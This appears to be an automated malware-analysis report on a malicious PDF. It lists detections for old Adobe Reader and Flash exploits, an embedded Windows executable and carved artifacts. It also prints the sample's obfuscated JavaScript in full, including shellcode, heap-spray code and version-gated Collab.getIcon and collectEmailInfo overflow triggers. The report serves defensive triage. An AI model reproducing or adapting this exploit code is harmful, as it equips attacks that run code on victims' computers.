MALICIOUS
Risk Score: 536
Machine Learning
- Nyx PDF Classifier: malicious score 0.9997
Heuristics: 13
- Adobe Flash Player RichMedia exploit (critical; CVE likely; rule CVE_2011_0611_FLASH_RICHMEDIA): PDF combines RichMedia Flash activation with an embedded AS3 SWF loader (ByteArray/loadBytes) and shellcode heap-spray staging. This is the static exploit shape associated with CVE-2011-0611 Flash content delivered through Adobe Reader.
- Collab.getIcon — CVE-2009-0927 (critical; CVE exact; rule CVE_2009_0927): PDF JavaScript calls Collab.getIcon. CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (Identified after JavaScript deobfuscation.)
- Collab.collectEmailInfo — CVE-2007-5659 (critical; CVE exact; rule CVE_2007_5659): PDF JavaScript calls Collab.collectEmailInfo. CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (Matched in decompressed stream.)
- Pidief-style multi-CVE JavaScript dispatcher (critical; CVE likely; rule PDF_PIDIEF_MULTI_CVE_DISPATCH): A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
- Embedded Windows executable payload in PDF stream (critical; rule PDF_EMBEDDED_PE_PAYLOAD): PDF stream bytes contain an embedded Windows executable with a verified PE header. Exploit chains often hide droppers inside ordinary streams rather than standard /EmbeddedFile attachments.
- Multi-CVE Adobe Reader JavaScript exploit kit (critical; rule PDF_ADOBE_READER_MULTI_CVE_JS_KIT): One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
- RichMedia (Flash) (high; rule PDF_RICHMEDIA): PDF contains /RichMedia (Adobe Flash), which is a historic exploit vector.
- Generic recovered JavaScript exploit stage (high; rule PDF_GENERIC_STAGE_RECOVERY): Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
- Suspicious extracted artifact (high; rule EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- JavaScript action (low; 1 related finding; rule PDF_JAVASCRIPT): PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Embedded JS stream (low; rule PDF_JS): PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Embedded file (low; rule PDF_EMBEDDED): PDF embeds a file attachment, which could carry an executable or another weaponised document as a nested payload.
- Embedded URL (info; rule EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in PDF document text)
  - http://ns.adobe.com/pdf/1.3/ (in PDF document text)
  - http://ns.adobe.com/xap/1.0/ (in PDF document text)
  - http://purl.org/dc/elements/1.1/ (in PDF document text)
  - http://ns.adobe.com/xap/1.0/mm/ (in PDF document text)
  - http://ns.adobe.com/pdfx/1.3/ (in PDF document text)
Extracted artifacts: 7
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| 8.swf | pdf-embedded-file | PDF EmbeddedFile object 37 at offset 0x5D588 | 2779 bytes |

SHA-256: f9b01c0b2b17a5adfac5067f5830191e3a1dbec29a92edf75abb22a0c9b8ab03
Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. actual_type=SWF; declared_or_context_type=PDF; filename=8.swf; kind=pdf-embedded-file. Carved SWF contains ByteArray/Loader/loadBytes staging terms.

| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0027_000.js | pdf-javascript-stream | PDF /JS object 27 at offset 0x5C5E6 | 11871 bytes |

SHA-256: c61c75240e452b771ab3b9181c4d90410172f161e2621065860b36c1bc0f5b31
Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 73 of 96 identifiers look randomly generated (e.g. 'WRJJ15bbWRJJ0700WRJJc083WRJJ8304WRJJ154d') — consistent with name-mangling obfuscation. Carved artifact contains 2 long base64-like blob(s).

Preview script (first 1,000 lines of the extracted script):
var sc
for(i=0;i<18000;i++)
sc=sc+0x60
var unes
if(app["\x76\x69\x65\x77\x65\x72\x56\x65\x72\x73\x69\x6F\x6E"] > 100)
{
for(i=0;i<18000;i++)
unes=unes+0x63
}
else
{unes= unescape}
var strTempA="\x62\x79\x74e\x54\x6f\x43\x68\x61\x72";
var strTempB="g\x65t\x49\x63\x6f\x6e";
var strTempC="c\x6fll\x65\x63\x74\x45\x6d\x61\x69lInfo";
function rep(count,what){
var v = "";
while (--count >= 0) v += what;
return v;
}
function strexchg(sc){
var re = /WRJJ/g;
sc = sc.replace(re,"\x25\x75");
return sc;
}
var dsafkljll = '0x';
function myunes(buf) {
var ret =""
for (var x=0;x < buf["\x6c\x65\x6e\x67\x74\x68"]; x+=2) {
ret = ret+util[strTempA](Number(dsafkljll + buf["\x73\x75\x62\x73\x74\x72"](x,2)));//
}
return ret;
}
sc1=unes(strexchg("\x25\x75\x30\x43\x30\x63" +
"WRJJ14ebWRJJb258WRJJ8a98WRJJ3218WRJJ88daWRJJ4018WRJJ3881WRJJdada" +
"WRJJdadaWRJJf175WRJJ05ebWRJJe7e8WRJJffffWRJJ64ffWRJJ17f0WRJJ806a" +
"WRJJf0f9WRJJ7e23WRJJa2b7WRJJc9f0WRJJ3ab7WRJJf099WRJJ7aa1WRJJ1be5" +
"WRJJc2f0WRJJbc4cWRJJf00cWRJJ0e2aWRJJc3cfWRJJ7bf0WRJJff0fWRJJf019" +
"WRJJfecfWRJJ6795WRJJ03f0WRJJ131fWRJJf07dWRJJae2aWRJJ8b97WRJJdbf0" +
"WRJJ3426WRJJf043WRJJ8b16WRJJ3492WRJJaaf0WRJJ09ecWRJJ1394WRJJ1b6c" +
"WRJJd874WRJJ6413WRJJ4aabWRJJ4aabWRJJ13fcWRJJa8c2WRJJd313WRJJ1394" +
"WRJJ84d1WRJJf113WRJJ1390WRJJb8d9WRJJ9113WRJJc8a0WRJJed80WRJJ356b")
)
;
sc2=unes(strexchg("WRJJ13f8WRJJa4ddWRJJd413WRJJe09dWRJJ559bWRJJc113WRJJ9bb8WRJJ1345" +
"WRJJ80e1WRJJ13d7WRJJ23acWRJJ6d9bWRJJ9701WRJJ9e26WRJJ5ca2WRJJ90ec" +
"WRJJ5259WRJJ9b9fWRJJde48WRJJ6973WRJJcca3WRJJ84bcWRJJ7cedWRJJc113" +
"WRJJ9bbcWRJJfe45WRJJa413WRJJ13e3WRJJ84c1WRJJ459bWRJJb49bWRJJ0d23" +
"WRJJ33c7WRJJf9cfWRJJ17a5WRJJ806aWRJJedf9WRJJ132cWRJJ1b74WRJJe074" +
"WRJJe511WRJJf264WRJJc69cWRJJceccWRJJcf67WRJJ1148WRJJ48ddWRJJ601b" +
"WRJJed67WRJJ1b9eWRJJ9c5eWRJJ73ceWRJJa574WRJJb898WRJJ9898WRJJ6bee" +
"WRJJ98f2WRJJ98f2WRJJf8f0WRJJ989bWRJJce98WRJJcf67WRJJ154cWRJJ7cdd" +
"WRJJ98f2WRJJf2c8WRJJ158cWRJJ70ddWRJJcec8WRJJcf67WRJJ1d40WRJJec58" +
"WRJJ194aWRJJ70e5WRJJf7e8WRJJedf1WRJJ51edWRJJe519WRJJa574WRJJcff7")
)
sc3=unes(strexchg("WRJJed16WRJJ1158WRJJ70edWRJJdd13WRJJ9b60WRJJ6cddWRJJdd9bWRJJ1168" +
"WRJJ74ddWRJJf2c8WRJJ67d8WRJJ74cfWRJJdd11WRJJ1d7cWRJJ9758WRJJ961c" +
"WRJJ9899WRJJ1598WRJJ78ddWRJJ98f2WRJJ67c8WRJJ74edWRJJed67WRJJce7c" +
"WRJJcf67WRJJ1d40WRJJ9758WRJJ6e1cWRJJ9898WRJJce98WRJJcf67WRJJ1378" +
"WRJJ7cc5WRJJc59bWRJJ1168WRJJ78c5WRJJc59bWRJJ116cWRJJ44c5WRJJd513" +
"WRJJa860WRJJ93d4WRJJ7a67WRJJ1962WRJJ9c74WRJJ9899WRJJcc98WRJJ9cf0" +
"WRJJ9899WRJJ6798WRJJ68cfWRJJ581dWRJJ1c97WRJJ985bWRJJ9898WRJJfd11" +
"WRJJ9b40WRJJ135cWRJJ1360WRJJ7cedWRJJd513WRJJ6b68WRJJ133cWRJJ64e5" +
"WRJJ9af2WRJJed67WRJJ6740WRJJ70cfWRJJdd11WRJJ1b4cWRJJ6760WRJJ1c97" +
"WRJJ9805WRJJ9898WRJJed67WRJJ676cWRJJ78edWRJJ67c8WRJJ7ccfWRJJed67")
)
sc4=unes(strexchg("WRJJ674cWRJJ78cfWRJJed67WRJJ6740WRJJ54cfWRJJcf67WRJJd844WRJJ6013" +
"WRJJ511bWRJJ2867WRJJ6abaWRJJ6a36WRJJ1336WRJJ5f6cWRJJfb9eWRJJfcf5" +
"WRJJ5fb6WRJJ9cdeWRJJe0fdWRJJb8fdWRJJde5fWRJJb790WRJJb8fbWRJJ1bba" +
"WRJJ945eWRJJ51abWRJJ9c12WRJJa497WRJJecbaWRJJ109eWRJJ969cWRJJ73d9" +
"WRJJ156bWRJJ9684WRJJ9b5eWRJJf298WRJJce98WRJJe513WRJJ6764WRJJ70cf" +
"WRJJ5ffeWRJJba9bWRJJ1198WRJJ70ddWRJJ601bWRJJec67WRJJ67acWRJJ48ed" +
"WRJJd8f2WRJJcf67WRJJ1174WRJJ4cddWRJJ581dWRJJbdecWRJJ6013WRJJed13" +
"WRJJ1344WRJJ60d5WRJJ3c6bWRJJe513WRJJ6764WRJJ48edWRJJ67c8WRJJ70ed" +
"WRJJcf67WRJJ677cWRJJ70edWRJJcf67WRJJf278WRJJ6798WRJJ40edWRJJcf67" +
"WRJJ676cWRJJ60cfWRJJ98f2WRJJ67c8WRJJ64cfWRJJdadaWRJJdada"));
////////////agjpg;./.gw]\qwgkq
sc=""+sc1+""+sc2+""+sc3+sc4;
function zzzzzzzz() {
blah = rep(128, unes("%u4242%u4242%u4242%u4242%u4242")) + sc;
bbk = unes("%u4242%u4242");
var h="g\x65t\x49\x63\x6f\x6e";
wap = 0x24+blah["l\x65\x6e\x67\x74\x68"]
while (bbk["l\x65\x6e\x67\x74\x68"]<wap) bbk+=bbk;
fillbk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, wap);
bk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, bbk["l\x65\x6e\x67\x74\x68"]-wap);
while(bk["\x6c\x65\x6e\x67\x74\x68"]+wap<262144) bk = bk+bk+fillbk;
mm = new Array()//jf;afkla'[
for (i=0;i<350;i++) mm[i] = bk + blah;
of = rep(4096, myunes("\x30a\x30a\x30a\x30a"));
var a=["\x5f\x4e\x2e\x62\x75\x6e\x64\x6c\x65"];//next time
var b=5;//shlshgl
Collab[h](of+a[b-b])//ajf[pa';[
}
function zzzzzzzzzzzzzzzz()
{
blah = rep(128, unes("\x25\x754242\x25\x754242\x25\x754242\x25\x754242\x25\x754242")) +""+ sc
bbk = unes("\x25\x754242\x25\x754242");
wap = 20+blah["l\x65\x6e\x67\x74\x68"]
while (bbk["l\x65\x6e\x67\x74\x68"]<wap) bbk+=bbk;
fillbk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, wap);
bk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, bbk["l\x65\x6e\x67\x74\x68"]-wap);
while(bk["l\x65\x6e\x67\x74\x68"]+wap<262144) bk = bk+bk+fillbk;
mm = new Array()//ahplgha[
for (i=0;i<250;i++) mm[i] = bk + blah;
plin = rep(8000, unes("\x25\x75\x30a\x30a\x25\x75\x30a\x30a"));
if (app["\x76\x69\x65\x77\x65\x72\x56\x65\x72\x73\x69\x6F\x6E"] >= 6.0)//gakghfvlgfal
{
Collab.collectEmailInfo({subj:0,msg:plin});
}
}
function exp() {
var jkdhg=app
if(app["\x76\x69\x65\x77\x65\x72\x56\x65\x72\x73\x69\x6F\x6E"] >= 8.0)
{
zzzzzzzz();
}
else{
zzzzzzzzzzzzzzzz();
}
}
if(app.viewerVersion>=9.00)
{
var LbWxSqgNmAwjUaoXaywhlH
if(app.viewerVersion > 100)
{
for(i = 0; i<1000; i++)
LbWxSqgNmAwjUaoXaywhlH = LbWxSqgNmAwjUaoXaywhlH +0x120;
}
else
{ var LbWxSqgNmAwjUaoXaywhlH =unescape}
var TCfIpiOxOYTTeNgDQsDQaDtVjQ;
for(i=0;i<18000;i++)
TCfIpiOxOYTTeNgDQsDQaDtVjQ = TCfIpiOxOYTTeNgDQsDQaDtVjQ+0x70;
var TCfIpiOxOYTTeNgDQsDQaDtVjQ = LbWxSqgNmAwjUaoXaywhlH(strexchg("%\x75\x30C\x30\x43\x25u\x30\x430\x43WRJJ4919WRJJ0700\x25\x7512bb\x25\x750700WRJJ1022WRJJ0700%\x75\x30C\x30\x43\x25u\x30\x430\x43" +
"%\x75\x30C\x30\x43\x25u\x30\x430\x43WRJJ1599WRJJ0700WRJJ0124WRJJ0001WRJJ72f7WRJJ0700" +
"WRJJ0104WRJJ0001WRJJ15bbWRJJ0700WRJJ1000WRJJ0000WRJJ154dWRJJ0700" +
"WRJJ15bbWRJJ0700WRJJ0300WRJJ7ffeWRJJ7fb2WRJJ0700WRJJ15bbWRJJ0700" +
"WRJJ0011WRJJ0001WRJJa8acWRJJ0700WRJJ15bbWRJJ0700WRJJ0100WRJJ0001" +
"WRJJa8acWRJJ0700WRJJ72f7WRJJ0700WRJJ0011WRJJ0001WRJJ52e2WRJJ0700" +
"WRJJ5c54WRJJ0700WRJJffffWRJJffffWRJJ0100WRJJ0001WRJJ0000WRJJ0000" +
"WRJJ0104WRJJ0001WRJJ1000WRJJ0000WRJJ0040WRJJ0000"+
"WRJJd731WRJJ0700WRJJ15bbWRJJ0700WRJJ905aWRJJ9054WRJJ154dWRJJ0700WRJJa722"+
"WRJJ0700WRJJ15bbWRJJ0700WRJJeb5aWRJJ5815WRJJ154dWRJJ0700WRJJa722WRJJ0700WRJJ15bbWRJJ0700WRJJ1a8bWRJJ1889WRJJ154dWRJJ0700WRJJa722WRJJ0700"+
"WRJJ15bbWRJJ0700WRJJc083WRJJ8304WRJJ154dWRJJ0700WRJJa722WRJJ0700WRJJ15bbWRJJ0700WRJJ04c2WRJJfb81WRJJ154dWRJJ0700WRJJa722WRJJ0700WRJJ15bb"+
"\x25\x750700%\x75\x30C\x30\x43\x25u\x30\x430\x43\x25\x75154d\x25\x750700\x25\x75a722\x25\x750700\x25\x7515bb\x25\x750700\x25\x75ee75\x25\x7505eb\x25\x75154d\x25\x750700\x25\x75a722\x25\x750700\x25\x7515bb\x25\x750700"+
"\x25\x75e6e8\x25\x75ffff\x25\x75154d\x25\x750700\x25\x75a722\x25\x750700\x25\x7515bb\x25\x750700\x25\x7590ff\x25\x759090\x25\x75154d\x25\x750700\x25\x75a722\x25\x750700\x25\x7515bb\x25\x750700\x25\x759090"+
"\x25\x759090\x25\x75154d\x25\x750700\x25\x75a722\x25\x750700\x25\x7515bb\x25\x750700\x25\x759090\x25\x759090\x25\x75154d\x25\x750700\x25\x75a722\x25\x750700\x25\x7515bb\x25\x750700\x25\x75ffff\x25\x7590ff"+
"WRJJ154dWRJJ0700WRJJd731WRJJ0700WRJJ112fWRJJ0700"+
"WRJJ3030WRJJ3030\x25\x75\x30\x43\x30\x63" +
"WRJJ14ebWRJJb258WRJJ8a98WRJJ3218WRJJ88daWRJJ4018WRJJ3881WRJJdada" +
"WRJJdadaWRJJf175WRJJ05ebWRJJe7e8WRJJffffWRJJ64ffWRJJ17f0WRJJ806a" +
"WRJJf0f9WRJJ7e23WRJJa2b7WRJJc9f0WRJJ3ab7WRJJf099WRJJ7aa1WRJJ1be5" +
"WRJJc2f0WRJJbc4cWRJJf00cWRJJ0e2aWRJJc3cfWRJJ7bf0WRJJff0fWRJJf019" +
"WRJJfecfWRJJ6795WRJJ03f0WRJJ131fWRJJf07dWRJJae2aWRJJ8b97WRJJdbf0" +
"WRJJ3426WRJJf043WRJJ8b16WRJJ3492WRJJaaf0WRJJ09ecWRJJ1394WRJJ1b6c" +
"WRJJd874WRJJ6413WRJJ4aabWRJJ4aabWRJJ13fcWRJJa8c2WRJJd313WRJJ1394" +
"WRJJ84d1WRJJf113WRJJ1390WRJJb8d9WRJJ9113WRJJc8a0WRJJed80WRJJ356b" +
"WRJJ13f8WRJJa4ddWRJJd413WRJJe09dWRJJ559bWRJJc113WRJJ9bb8WRJJ1345" +
"WRJJ80e1WRJJ13d7WRJJ23acWRJJ6d9bWRJJ9701WRJJ9e26WRJJ5ca2WRJJ90ec" +
"WRJJ5259WRJJ9b9fWRJJde48WRJJ6973WRJJcca3WRJJ84bcWRJJ7cedWRJJc113" +
"WRJJ9bbcWRJJfe45WRJJa413WRJJ13e3WRJJ84c1WRJJ459bWRJJb49bWRJJ0d23" +
"WRJJ33c7WRJJf9cfWRJJ17a5WRJJ806aWRJJedf9WRJJ132cWRJJ1b74WRJJe074" +
"WRJJe511WRJJf264WRJJc69cWRJJceccWRJJcf67WRJJ1148WRJJ48ddWRJJ601b" +
"WRJJed67WRJJ1b9eWRJJ9c5eWRJJ73ceWRJJa574WRJJb898WRJJ9898WRJJ6bee" +
"WRJJ98f2WRJJ98f2WRJJf8f0WRJJ989bWRJJce98WRJJcf67WRJJ154cWRJJ7cdd" +
"WRJJ98f2WRJJf2c8WRJJ158cWRJJ70ddWRJJcec8WRJJcf67WRJJ1d40WRJJec58" +
"WRJJ194aWRJJ70e5WRJJf7e8WRJJedf1WRJJ51edWRJJe519WRJJa574WRJJcff7" +
"WRJJed16WRJJ1158WRJJ70edWRJJdd13WRJJ9b60WRJJ6cddWRJJdd9bWRJJ1168" +
"WRJJ74ddWRJJf2c8WRJJ67d8WRJJ74cfWRJJdd11WRJJ1d7cWRJJ9758WRJJ961c" +
"WRJJ9899WRJJ1598WRJJ78ddWRJJ98f2WRJJ67c8WRJJ74edWRJJed67WRJJce7c" +
"WRJJcf67WRJJ1d40WRJJ9758WRJJ6e1cWRJJ9898WRJJce98WRJJcf67WRJJ1378" +
"WRJJ7cc5WRJJc59bWRJJ1168WRJJ78c5WRJJc59bWRJJ116cWRJJ44c5WRJJd513" +
"WRJJa860WRJJ93d4WRJJ7a67WRJJ1962WRJJ9c74WRJJ9899WRJJcc98WRJJ9cf0" +
"WRJJ9899WRJJ6798WRJJ68cfWRJJ581dWRJJ1c97WRJJ985bWRJJ9898WRJJfd11" +
"WRJJ9b40WRJJ135cWRJJ1360WRJJ7cedWRJJd513WRJJ6b68WRJJ133cWRJJ64e5" +
"WRJJ9af2WRJJed67WRJJ6740WRJJ70cfWRJJdd11WRJJ1b4cWRJJ6760WRJJ1c97" +
"WRJJ9805WRJJ9898WRJJed67WRJJ676cWRJJ78edWRJJ67c8WRJJ7ccfWRJJed67" +
"WRJJ674cWRJJ78cfWRJJed67WRJJ6740WRJJ54cfWRJJcf67WRJJd844WRJJ6013" +
"WRJJ511bWRJJ2867WRJJ6abaWRJJ6a36WRJJ1336WRJJ5f6cWRJJfb9eWRJJfcf5" +
"WRJJ5fb6WRJJ9cdeWRJJe0fdWRJJb8fdWRJJde5fWRJJb790WRJJb8fbWRJJ1bba" +
"WRJJ945eWRJJ51abWRJJ9c12WRJJa497WRJJecbaWRJJ109eWRJJ969cWRJJ73d9" +
"WRJJ156bWRJJ9684WRJJ9b5eWRJJf298WRJJce98WRJJe513WRJJ6764WRJJ70cf" +
"WRJJ5ffeWRJJba9bWRJJ1198WRJJ70ddWRJJ601bWRJJec67WRJJ67acWRJJ48ed" +
"WRJJd8f2WRJJcf67WRJJ1174WRJJ4cddWRJJ581dWRJJbdecWRJJ6013WRJJed13" +
"WRJJ1344WRJJ60d5WRJJ3c6bWRJJe513WRJJ6764WRJJ48edWRJJ67c8WRJJ70ed" +
"WRJJcf67WRJJ677cWRJJ70edWRJJcf67WRJJf278WRJJ6798WRJJ40edWRJJcf67" +
"WRJJ676cWRJJ60cfWRJJ98f2WRJJ67c8WRJJ64cfWRJJdadaWRJJdada"));
var XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV = LbWxSqgNmAwjUaoXaywhlH(strexchg("WRJJ0c0CWRJJ0c0c"));
while (XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV["l\x65\x6e\x67\x74\x68"] +28 < 65536)
XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV+=XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV;
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo = XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, (3084-36)/2);
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo += TCfIpiOxOYTTeNgDQsDQaDtVjQ;
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo += XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV;
KoHQQkRIckZJKtdlKTGyUUS = KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, 65536/2);
while(KoHQQkRIckZJKtdlKTGyUUS["l\x65\x6e\x67\x74\x68"] < 524288) KoHQQkRIckZJKtdlKTGyUUS += KoHQQkRIckZJKtdlKTGyUUS;
bdfzsvuobNyDZnrqvFjkFWMnGaDbvlYCKTfwjiCwLEXKoTngADhROnZManDz = KoHQQkRIckZJKtdlKTGyUUS["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, 524288-4120/2) //ashlfajl;afj
var JkNUxvkKFXvIXewntXRjnLOytMONPyrcUEpPSGrzHuBijVDY = new Array()//ip[wo][]
for(tYzswEF=0;tYzswEF<0x80;tYzswEF++) JkNUxvkKFXvIXewntXRjnLOytMONPyrcUEpPSGrzHuBijVDY[tYzswEF]=bdfzsvuobNyDZnrqvFjkFWMnGaDbvlYCKTfwjiCwLEXKoTngADhROnZManDz+"s";
//shklfh
//ahf;lajf;
}
else
{
exp();
}

| Filename | Kind | Source | Size |
|---|---|---|---|
| embedded_pdf_00000381.exe | embedded-pe | PDF raw stream PE payload at offset 0x381 | 370963 bytes |

SHA-256: 01124b4c3c11df9adc57fa3e32a7a27075ead5a6d1fa8d9b5dd3dff787a3bbbd
Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. actual_type=PE; declared_or_context_type=PDF; filename=embedded_pdf_00000381.exe; kind=embedded-pe

| Filename | Kind | Source | Size |
|---|---|---|---|
| generic_stage_recovery_000.js | deobfuscated-js | generic stage recovery split-literal-normalize from JavaScript object 27 at offset 0x5C5E6 | 10925 bytes |

SHA-256: 900ebcaedd2d850b23c3fd17dd0232ee691254f62853a1294aa5e0a5cf966f6d
Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 31 of 43 identifiers look randomly generated (e.g. 'WRJJ14ebWRJJb258WRJJ8a98WRJJ3218WRJJ88da') — consistent with name-mangling obfuscation. Carved artifact contains 7 long base64-like blob(s).

Preview script (first 1,000 lines of the extracted script):
var sc
for(i=0;i<18000;i++)
sc=sc+0x60
var unes
if(app["\x76\x69\x65\x77\x65\x72\x56\x65\x72\x73\x69\x6F\x6E"] > 100)
{
for(i=0;i<18000;i++)
unes=unes+0x63
}
else
{unes= unescape}
var strTempA="\x62\x79\x74e\x54\x6f\x43\x68\x61\x72";
var strTempB="g\x65t\x49\x63\x6f\x6e";
var strTempC="c\x6fll\x65\x63\x74\x45\x6d\x61\x69lInfo";
function rep(count,what){
var v = "";
while (--count >= 0) v += what;
return v;
}
function strexchg(sc){
var re = /WRJJ/g;
sc = sc.replace(re,"\x25\x75");
return sc;
}
var dsafkljll = '0x';
function myunes(buf) {
var ret =""
for (var x=0;x < buf["\x6c\x65\x6e\x67\x74\x68"]; x+=2) {
ret = ret+util[strTempA](Number(dsafkljll + buf["\x73\x75\x62\x73\x74\x72"](x,2)));//
}
return ret;
}
sc1=unes(strexchg("%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")
)
;
sc2=unes(strexchg("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")
)
sc3=unes(strexchg("WRJJed16WRJJ1158WRJJ70edWRJJdd13WRJJ9b60WRJJ6cddWRJJdd9bWRJJ1168WRJJ74ddWRJJf2c8WRJJ67d8WRJJ74cfWRJJdd11WRJJ1d7cWRJJ9758WRJJ961cWRJJ9899WRJJ1598WRJJ78ddWRJJ98f2WRJJ67c8WRJJ74edWRJJed67WRJJce7cWRJJcf67WRJJ1d40WRJJ9758WRJJ6e1cWRJJ9898WRJJce98WRJJcf67WRJJ1378WRJJ7cc5WRJJc59bWRJJ1168WRJJ78c5WRJJc59bWRJJ116cWRJJ44c5WRJJd513WRJJa860WRJJ93d4WRJJ7a67WRJJ1962WRJJ9c74WRJJ9899WRJJcc98WRJJ9cf0WRJJ9899WRJJ6798WRJJ68cfWRJJ581dWRJJ1c97WRJJ985bWRJJ9898WRJJfd11WRJJ9b40WRJJ135cWRJJ1360WRJJ7cedWRJJd513WRJJ6b68WRJJ133cWRJJ64e5WRJJ9af2WRJJed67WRJJ6740WRJJ70cfWRJJdd11WRJJ1b4cWRJJ6760WRJJ1c97WRJJ9805WRJJ9898WRJJed67WRJJ676cWRJJ78edWRJJ67c8WRJJ7ccfWRJJed67")
)
sc4=unes(strexchg("WRJJ674cWRJJ78cfWRJJed67WRJJ6740WRJJ54cfWRJJcf67WRJJd844WRJJ6013WRJJ511bWRJJ2867WRJJ6abaWRJJ6a36WRJJ1336WRJJ5f6cWRJJfb9eWRJJfcf5WRJJ5fb6WRJJ9cdeWRJJe0fdWRJJb8fdWRJJde5fWRJJb790WRJJb8fbWRJJ1bbaWRJJ945eWRJJ51abWRJJ9c12WRJJa497WRJJecbaWRJJ109eWRJJ969cWRJJ73d9WRJJ156bWRJJ9684WRJJ9b5eWRJJf298WRJJce98WRJJe513WRJJ6764WRJJ70cfWRJJ5ffeWRJJba9bWRJJ1198WRJJ70ddWRJJ601bWRJJec67WRJJ67acWRJJ48edWRJJd8f2WRJJcf67WRJJ1174WRJJ4cddWRJJ581dWRJJbdecWRJJ6013WRJJed13WRJJ1344WRJJ60d5WRJJ3c6bWRJJe513WRJJ6764WRJJ48edWRJJ67c8WRJJ70edWRJJcf67WRJJ677cWRJJ70edWRJJcf67WRJJf278WRJJ6798WRJJ40edWRJJcf67WRJJ676cWRJJ60cfWRJJ98f2WRJJ67c8WRJJ64cfWRJJdadaWRJJdada"));
////////////agjpg;./.gw]\qwgkq
sc=""+sc1+""+sc2+""+sc3+sc4;
function zzzzzzzz() {
blah = rep(128, unes("%u4242%u4242%u4242%u4242%u4242")) + sc;
bbk = unes("%u4242%u4242");
var h="g\x65t\x49\x63\x6f\x6e";
wap = 0x24+blah["l\x65\x6e\x67\x74\x68"]
while (bbk["l\x65\x6e\x67\x74\x68"]<wap) bbk+=bbk;
fillbk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, wap);
bk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, bbk["l\x65\x6e\x67\x74\x68"]-wap);
while(bk["\x6c\x65\x6e\x67\x74\x68"]+wap<262144) bk = bk+bk+fillbk;
mm = new Array()//jf;afkla'[
for (i=0;i<350;i++) mm[i] = bk + blah;
of = rep(4096, myunes("\x30a\x30a\x30a\x30a"));
var a=["\x5f\x4e\x2e\x62\x75\x6e\x64\x6c\x65"];//next time
var b=5;//shlshgl
Collab[h](of+a[b-b])//ajf[pa';[
}
function zzzzzzzzzzzzzzzz()
{
blah = rep(128, unes("\x25\x754242\x25\x754242\x25\x754242\x25\x754242\x25\x754242")) +""+ sc
bbk = unes("\x25\x754242\x25\x754242");
wap = 20+blah["l\x65\x6e\x67\x74\x68"]
while (bbk["l\x65\x6e\x67\x74\x68"]<wap) bbk+=bbk;
fillbk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, wap);
bk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, bbk["l\x65\x6e\x67\x74\x68"]-wap);
while(bk["l\x65\x6e\x67\x74\x68"]+wap<262144) bk = bk+bk+fillbk;
mm = new Array()//ahplgha[
for (i=0;i<250;i++) mm[i] = bk + blah;
plin = rep(8000, unes("\x25\x75\x30a\x30a\x25\x75\x30a\x30a"));
